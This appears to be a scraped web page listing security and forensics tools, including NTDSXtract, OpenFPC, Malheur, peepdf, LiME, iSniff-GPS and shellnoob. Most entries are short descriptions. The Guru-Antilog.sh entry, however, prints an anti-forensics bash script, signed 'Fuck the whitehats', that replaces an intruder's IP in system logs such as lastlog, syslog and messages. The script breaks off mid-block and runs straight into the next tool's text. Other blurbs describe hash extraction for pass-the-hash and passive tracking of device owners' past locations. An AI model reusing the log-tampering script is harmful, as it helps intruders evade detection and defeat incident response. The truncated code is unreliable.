Forensics

NTDSXtract

Overview:
Technically a forensics framework for analyzing NTDS.dit files. On the other side, it can be used to extract password hashes from the NTDS.dit file that can be used for pass the hash or cracking.

Tutorials:
Dumping a volume shadow copy and extracting - https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/

Guru-Antilog.sh

A bash script to wipe or exchange your IP in unix log files. Also wipes out /root/.bash_history.

#!/bin/bash
# Guru-Antilog V 0.1
# usage : to Exchanging your IP with fake IP y0 choose it
# and to clear your last command's and clear logout history  
# Remember that...
# y0 have one minute to logout from b0x no more.. so be carefull
# Fuck the whitehats
#
clear
echo "--------------------------------------------------------------------------------------------------------------------"
echo "                     Guru-Antilog c0ded  By [ sAFA7_eLNeT ] (SecurityGurus.NeT) - SecurityGurus[AT]irc.dal.net:6667 "
echo "  Greetz g0es to : Acid-WarZ,rOCk-MaStEr,j7a,MedoZero,Spiderz,and all SecurityGurus.NeT PPL and all 1--5.com folks "
echo "--------------------------------------------------------------------------------------------------------------------"
if [ "$UID" = "0" ];then
echo " h3re w3 g0 "
else
echo " `whoami` y0 must be login by root"
fi
echo -n " What's the ip y0 want to spoof it ?  "
read word
word=$word
echo -n " What's the Fake ip y0 want  using it ? "
read fake
fake=$fake
r0x="yes"
if [ ! -f /var/log/lastlog ]; then
r0x="no"
echo " i can't find lastlog"
fi
if [ "$r0x" = "yes" ]; then
echo " Editing lastlog"
sed "s/$word/$fake/g" /var/log/lastlog > /var/log/lastlog.new
mv /var/log/lastlog.new /var/log/lastlog
fi
syslog="yes"
if [ ! -f /var/log/syslog ]; then
echo " i can't find syslog"
 syslog="no"
fi
if [ "$syslog" = "yes" ]; then
echo " Editing syslog"
sed "s/$word/$fake/g" /var/log/syslog > /var/log/syslog.new
mv /var/log/syslog.new /var/log/syslog
fi
mess="yes"
if [ ! -f /var/log/messages ]; then
 echo " i can't find message "
mess="no"
fi
if [ "$mess" = "yes" ]; then
echo " Editing message"
sed "s/$word/$fake/g" /var/log/messages > /var/log/messages.new
mv /var/log/messages.new /var/log/messages
fi
http="yes"
if [ ! -f /var/log/httpd/access_log ]; then
 echo " i can't find access_log "

OpenFPC

OpenFPC is a set of scripts that combine to provide a lightweight full-packet network traffic recorder & buffering tool. It's design goal is to allow non-expert users to deploy a distributed network traffic recorder on COTS hardware while integrating into existing alert and log tools.

OpenFPC is described as lightweight because it follows a different design model to other FPC/Network traffic forensic tools that I have seen. It doesn't provide a user with the ability to trigger automatic events (IDS-like functions), or watch for anomalous traffic changes (NBA-like functions) as it is assumed external open source, or comercial tools already provide this detection capability. OpenFPC fits in as a companion to provide extra (full packet/traffic stream) data as a bolt-on to these tools allowing deeper analysis of event data where required.

Simply give it a logfile entry in one of the supported formats, and it will provide you with the PCAP.

For more information, visit the OpenFPC project home at http://www.openfpc.org
Features and futures

Automated install on Debain and RH style distributions
Extraction of single streams based on event occurrence time, or start/end timestamps
Extracts stream data based on common logfile/alert formats

Distributed collection with central extraction Optional compression and extract checksums Ability to request data from external tools/user interfaces
TODO

Central web-based UI for stream/data extraction from distributed remote storage buffers
Automatic calculation of an optimal configuration for extraction speed based on available storage.

Malheur Malware Analyzer

Malheur is a tool for the automatic analysis of malware behavior (program behavior recorded from malicious software in a sandbox environment). It has been designed to support the regular analysis of malicious software and the development of detection and defense measures. Malheur allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes.

Malheur builds on the concept of dynamic analysis: Malware binaries are collected in the wild and executed in a sandbox, where their behavior is monitored during run-time. The execution of each malware binary results in a report of recorded behavior. Malheur analyzes these reports for discovery and discrimination of malware classes using machine learning.

Malheur can be applied to recorded behavior of various format, as long as monitored events are separated by delimiter symbols, for example as in reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox and Joebox.

Extraction of prototypes. From a given set of reports, Malheur identifies a subset of prototypes representative for the full data set. The prototypes provide a quick overview of recorded behavior and can be used to guide manual inspection.

Clustering of behavior. Malheur automatically identifies groups (clusters) of reports containing similar behavior. Clustering allows for discovering novel classes of malware and provides the basis for crafting specific detection and defense mechanisms, such as anti-virus signatures.

Classification of behavior. Based on a set of previously clustered reports, Malheur is able to assign unknown behavior to known groups of malware. Classification enables identifying novel variants of malware and can be used to filter program behavior prior to manual inspection.

Hook Analyser Malware Tool

Malware Analyser is a freeware tool to perform static and dynamic analysis of the malwares.
Author: Beenu Arora

The features are:
String based analysis for registry, API calls, IRC Commands, DLL’s called and VMAware.
Display detailed headers of PE with all its section details, import and export symbols etc.
On distros, can perform an ASCII dump of the PE along with other options (check –help argument).

For windows, it can generate various section of a PE : DOS Header, DOS Stub, PE File Header, Image Optional Header, Section Table, Data Directories, Sections
ASCII dump on windows machine.
Code Analysis (disassembling)
Online malware checking (www.virustotal.com)
Check for Packer from the Database.

Tracer functionality: Can be used to identify
Anti-debugging Calls tricks, File system manipulations Calls Rootkit Hooks, Keyboard Hooks, DEP Setting Change, Network Identification traces.

Signature Creation: Allows to create signature of malware.
Batch Mode Scan to Scan all DLL and Exe in directories and sub-directories

Recent updates:
--Added Traces signatures
--Improved parsing
--Added ThreatExpert for online scanning option
--Packed libraries onto single executable
--Improved Traces signatures

peepdf

peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not. The aim of this tool is to provide all the necessary components that a security researcher could need in a PDF analysis without using 3 or 4 tools to make all the tasks. With peepdf it's possible to see all the objects in the document showing the suspicious elements, supports all the most used filters and encodings, it can parse different versions of a file, object streams and encrypted files. With the installation of PyV8 and Pylibemu it provides Javascript and shellcode analysis wrappers too. Apart of this it's able to create new PDF files and to modify/obfuscate existent ones.

The main functionalities of peepdf are the following:

Analysis:
Decodings: hexadecimal, octal, name objects
More used filters
References in objects and where an object is referenced
Strings search (including streams)
Physical structure (offsets)
Logical tree structure
Metadata
Modifications between versions (changelog)
Compressed objects (object streams)
Analysis and modification of Javascript (Spidermonkey): unescape, replace, join
Shellcode analysis (Libemu python wrapper, pylibemu)
Variables (set command)
Extraction of old versions of the document
Easy extraction of objects, Javascript code, shellcodes (>, >>, $>, $>>)
Checking hashes on VirusTotal

Creation/Modification:
Basic PDF creation
Creation of PDF with Javascript executed wen the document is opened
Creation of object streams to compress objects
Embedded PDFs
Strings and names obfuscation
Malformed PDF output: without endobj, garbage in the header, bad header...
Filters modification
Objects modification

Execution modes:
Simple command line execution
Powerful interactive console (colorized or not)
Batch mode

TODO:
Embedded PDFs analysis
Improving automatic Javascript analysis

LiME Forensics

LiME (formerly DMD) is a Loadable Kernel Module (LKM), which allows the acquisition of volatile memory from Linux and Linux-based devices, such as those powered by Android. The tool supports acquiring memory either to the file system of the device or over the network. LiME is unique in that it is the first tool that allows full memory captures from Android devices. It also minimizes its interaction between user and kernel space processes during acquisition, which allows it to produce memory captures that are more forensically sound than those of other tools designed for Linux memory acquisition.

iSniff-GPS

iSniff GPS passively sniffs for SSID probes, ARPs and MDNS (Bonjour) packets broadcast by nearby iPhones, iPads and other wireless devices. The aim is to collect data which can be used to identify each device and determine previous geographical locations, based solely on information each device discloses about previously joined WiFi networks.

iOS devices transmit ARPs which sometimes contain MAC addresses (BSSIDs) of previously joined WiFi networks, as described in [1]. iSniff GPS captures these ARPs and submits MAC addresses to Apple's WiFi location service (masquerading as an iOS device) to obtain GPS coordinates for a given BSSID. If only SSID probes have been captured for a particular device, iSniff GPS can query network names on wigle.net and visualise possible locations.

By geo-locating multiple SSIDs and WiFi router MAC addresses, it is possible to determine where a device (and by implication its owner) is likely to have been.

Components:
iSniff GPS contains 2 major components and further python modules:

iSniff_import.py uses Scapy to extract data from a live capture or pcap file and inserts it into a database (iSniff_GPS.sqlite3 by default).

A Django web application provides a browser-based interface to view and analyse the data collected. This includes views of all detected devices and the SSIDs / BSSIDs each has probed for, a view by network, Google Maps views for visualising possible locations of a given BSSID or SSID, and a pie chart view showing a breakdown of the most popular device manufacturers based on client MAC address Ethernet OUIs.

wloc.py provides a QueryBSSID() function which looks up a given BSSID (AP MAC address) on Apple's WiFi location service. It will return the coordinates of the MAC queried for and usually an additional 400 nearby BSSIDs and their coordinates.

..cantor.dust..

..cantor.dust.. is an interactive binary visualization tool, a radical evolution of the traditional hex editor. By translating binary information to a visual abstraction, reverse engineers and forensic analysts can sift through mountains of arbitrary data in seconds. Even previously unseen instruction sets and data formats can be easily located and understood through their visual fingerprint. ..cantor.dust.. dramatically accelerates the analysis process, and, for the experienced user, forms an indispensable tool in the reverser's arsenal.

shellnoob

shellnoob is a toolkit to help you write shellcode.

Features:
convert shellcode between different formats and sources. Formats currently supported: asm, bin, hex, obj, exe, C, python, ruby, pretty, safeasm, completec, shellstorm. (All details in the "Formats description" section.)
interactive asm-to-opcode conversion (and viceversa) mode. This is useful when you cannot use specific bytes in the shellcode and you want to figure out if a specific assembly instruction will cause problems.
support for both ATT & Intel syntax. Check the --intel switch.
support for 32 and 64 bits (when playing on x86_64 machine). Check the --64 switch.
resolve syscall numbers, constants, and error numbers (now implemented for real! Smile).
portable and easily deployable (it only relies on gcc/as/objdump and python). And it just one self-contained python script!
in-place development: you run ShellNoob directly on the target architecture!
built-in support for Linux/x86, Linux/x86_64, Linux/ARM, FreeBSD/x86, FreeBSD/x86_64.
"*prepend breakpoint*" option. Check the -c switch.
read from stdin / write to stdout support (use "-" as filename)
uber cheap debugging: check the --to-strace and --to-gdb option!
Use ShellNoob as a Python module in your scripts! Check the "ShellNoob as a library" section.
Verbose mode shows the low-level steps of the conversion: useful to debug / understand / learn!
Extra plugins: binary patching made easy with the --file-patch, --vm-patch, --fork-nopper options! (all details below)

Syndicate content